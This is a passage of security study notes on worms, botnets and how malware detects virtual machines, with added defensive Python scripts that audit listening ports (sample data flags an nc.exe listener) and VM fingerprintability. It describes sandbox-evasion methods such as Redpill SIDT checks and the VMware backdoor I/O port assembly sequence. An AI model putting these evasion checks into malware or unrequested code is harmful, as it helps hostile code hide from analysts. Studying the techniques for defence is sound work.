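  TCP    0.0.0.0:1545           0.0.0.0:0              LISTENING       3188
  TCP    10.0.0.5:49712         10.0.0.9:445           ESTABLISHED     4
  UDP    0.0.0.0:123            *:*                                    1100
"""

# Constructed "tasklist /fo csv /nh" output.
TASKLIST_SAMPLE = """\
"svchost.exe","912","Services","0","9,412 K"
"System","4","Services","0","1,200 K"
"nc.exe","3188","Services","0","2,048 K"
"svchost.exe","1100","Services","0","7,300 K"
"""

# Baseline recorded during preparation: which image is expected on each listening port.
EXPECTED_LISTENERS = {
    ("TCP", 135): "svchost.exe",
    ("TCP", 445): "System",
    ("UDP", 123): "svchost.exe",
}


def parse_listeners(netstat_text):
    """Yield (proto, port, pid) for every listening socket in netstat -ano output."""
    for line in netstat_text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue
        proto, local = fields[0], fields[1]
        # TCP rows carry a State column, UDP rows do not; the PID is the last field either way.
        if proto == "TCP" and fields[3] != "LISTENING":
            continue
        port = int(local.rsplit(":", 1)[1])  # rsplit also copes with [::]:port
        yield proto, port, int(fields[-1])


def parse_tasklist(tasklist_text):
    """Map PID -> image name from tasklist CSV output."""
    return {int(row[1]): row[0] for row in csv.reader(io.StringIO(tasklist_text)) if row}


def find_unexpected_listeners(netstat_text, tasklist_text, expected=EXPECTED_LISTENERS):
    """Return (proto, port, pid, image) for listeners absent from the baseline, or whose
    owning image differs from the baseline (a renamed binary on a familiar port)."""
    images = parse_tasklist(tasklist_text)
    findings = []
    for proto, port, pid in parse_listeners(netstat_text):
        image = images.get(pid, "<unknown>")
        if expected.get((proto, port)) != image:
            findings.append((proto, port, pid, image))
    return sorted(findings)


if __name__ == "__main__":
    for finding in find_unexpected_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print("unexpected listener:", finding)  # ('TCP', 1545, 3188, 'nc.exe')
```

The same PID join works against schtasks /query /fo csv output for the scheduled-task check, and the baseline is what makes the comparison meaningful: without a record of normal listeners taken during preparation, every port looks equally suspicious during an incident.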

WORM

A self-replicating code that spreads across the network.


Each instance is called a segment.

They use vulnerabilities in applications and operating systems to spread. E.g. the Blaster worm uses a buffer overflow vulnerability in MS-RPC DCOM. From 2005 on, worms started carrying bots, which gave rise to botnets.

Multi-exploit worms - The Nimda worm carried 12 to 15 different exploits (multiple ways to break into the machine).

Polymorphic worms - The worm recodes itself each time it infects another machine, to evade detection.

1. Encrypt the original code of the worm with a random key (a simple XOR).

2. Generate a short decryptor for that key (the polymorphic decryptor, PD).

3. This operation is done by the polymorphic engine (PE), which is included with the worm's code.

Open source Toolkit to Mutate Exploits – ADMMutate, CLET, and JempiScodes.

They can drop Trojans and backdoors, which gave rise to botnets.

Metamorphic Worms – It changes its functionality. It might download from C&C.

Defences

Buffer overflow protection

Process for Rapid Patching

Use HIDS, NIDS. Also Contact Network Management Personnel to identify Chokepoints at various places inside organization where you can place Filters.

Encrypt your desktops and laptops with software such as PointSec, so that even if a bot gets in, it cannot get at the data.


Propagation: Emails, Browser exploits, Drive by downloads

Mechanism for Botnet controls:

IRC from Command & Control Server – Most Popular Mechanism

Some bots periodically log in to a user account on MySpace or some blog to read the commands stored there.

Distributed P2P communication channels: a command is injected into one bot; the remaining bots check for updates with their neighbour bots, take the command and spread it onward. This removes the single point of failure of one C&C server; the botnet becomes self-aware.

Botnets Detecting Virtual Machines

Since virtual machines are used to analyse malware, bots detect that they are running in a virtual machine and shut down their malicious activity.

They check for artifacts of the virtualization software in memory, the file system, the registry and the running processes of the machine.


Redpill

o Executes the SIDT instruction, which saves the address of the Interrupt Descriptor Table.

o If it is running on the original machine, the address is in lower memory (< 0xd0), near the operating system kernel.

o If it is running in a VM, the address value is higher.

Scoopy Doo - SIDT, SGDT, SLDT

SIDT - Store Interrupt Descriptor Table

SGDT - Store Global Descriptor Table

SLDT - Store Local Descriptor Table

o If these values are consistent with virtualization, you are running virtualized.

Look for Virtualized Hardware

o Look at the MAC address, device drivers, interfaces
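Added example, not from the notes or from any of the tools named here: an analyst's check of how easily an analysis VM is fingerprinted through its network hardware, i.e. the MAC OUI and the adapter/driver description that the "look at MAC, device drivers" item refers to. The ipconfig /all excerpt is constructed; the OUI list covers the common hypervisor vendors and the keyword list is an assumption.

```python
import re

# Constructed "ipconfig /all" excerpt (not captured from a real host).
IPCONFIG_SAMPLE = """\
Ethernet adapter Local Area Connection:

   Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
   Physical Address. . . . . . . . . : 00-0C-29-3A-7B-11

Ethernet adapter Local Area Connection 2:

   Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet
   Physical Address. . . . . . . . . : 00-10-18-4F-22-90
"""

# OUI prefixes (first three octets) assigned to virtualization vendors.
VIRTUAL_OUIS = {
    "00:50:56": "VMware", "00:0C:29": "VMware", "00:05:69": "VMware", "00:1C:14": "VMware",
    "08:00:27": "VirtualBox",
    "00:16:3E": "Xen",
    "00:15:5D": "Hyper-V",
    "00:1C:42": "Parallels",
    "52:54:00": "QEMU/KVM",
}

# Adapter/driver description keywords that name the hypervisor outright (assumed list).
VIRTUAL_DRIVER_KEYWORDS = ("vmware", "virtualbox", "vbox", "hyper-v", "xen", "virtio", "parallels")


def normalize_mac(mac):
    """Accept 00-0C-29-.., 00:0c:29:.. or 000c29.. and return the upper-case colon form."""
    hexdigits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(hexdigits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))


def virtualization_vendor(mac):
    """Return the hypervisor vendor implied by the MAC's OUI, or None for real hardware."""
    return VIRTUAL_OUIS.get(normalize_mac(mac)[:8])


def parse_adapters(ipconfig_text):
    """Return [(adapter_header, description, mac)] from ipconfig /all output."""
    adapters, name, desc = [], None, None
    for line in ipconfig_text.splitlines():
        if line and not line.startswith(" ") and line.rstrip().endswith(":"):
            name, desc = line.strip().rstrip(":"), None  # "Ethernet adapter ...:" header
        elif "Description" in line:
            desc = line.split(":", 1)[1].strip()
        elif "Physical Address" in line:
            adapters.append((name, desc, line.split(":", 1)[1].strip()))
    return adapters


def audit_virtual_hardware(ipconfig_text):
    """List (adapter, evidence) pairs where the MAC OUI or driver name reveals a hypervisor."""
    findings = []
    for name, desc, mac in parse_adapters(ipconfig_text):
        vendor = virtualization_vendor(mac)
        if vendor:
            findings.append((name, f"MAC OUI belongs to {vendor}"))
        if desc and any(k in desc.lower() for k in VIRTUAL_DRIVER_KEYWORDS):
            findings.append((name, f"driver name reveals hypervisor: {desc}"))
    return findings


if __name__ == "__main__":
    for adapter, evidence in audit_virtual_hardware(IPCONFIG_SAMPLE):
        print(adapter, "->", evidence)
```

A sandbox whose first adapter reports both a VMware OUI and a VMware driver name is trivially recognisable; an empty findings list from this check is the minimum an analysis VM should achieve before the deeper instruction-level checks below even matter.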

VMDetect - It runs instructions that only virtual machines execute; on the original machine they raise an invalid instruction fault.

VMware Backdoor I/O Port - Look for changes in processor behaviour that are associated with the guest-host communications channel.

Clock synchronization, copy+paste, drag and drop etc. happen over this COM channel.

The following operation invokes Backdoor functions:

/* in Intel syntax (MASM and most Windows based assemblers) */

MOV EAX, 564D5868h /* magic number */

MOV EBX, command-specific-parameter

MOV CX, backdoor-command-number

MOV DX, 5658h /* VMware I/O port */

IN EAX, DX (or OUT DX, EAX)

/* in AT&T syntax (gnu as and many unix based assemblers) */

movl $0x564D5868, %eax; /* magic number */

movl command-specific-parameter, %ebx;

movw backdoor-command-number, %cx;

movw $0x5658, %dx; /* VMware I/O port */

inl %dx, %eax; (or outl %eax, %dx)

In appearance it is just a straightforward I/O access operation.

Depending on the backdoor command number passed in CX (with its parameter in EBX), different operations are carried out.

Source code:


http://chitchat.at.infoseek.co.jp/vmware/backdoor.html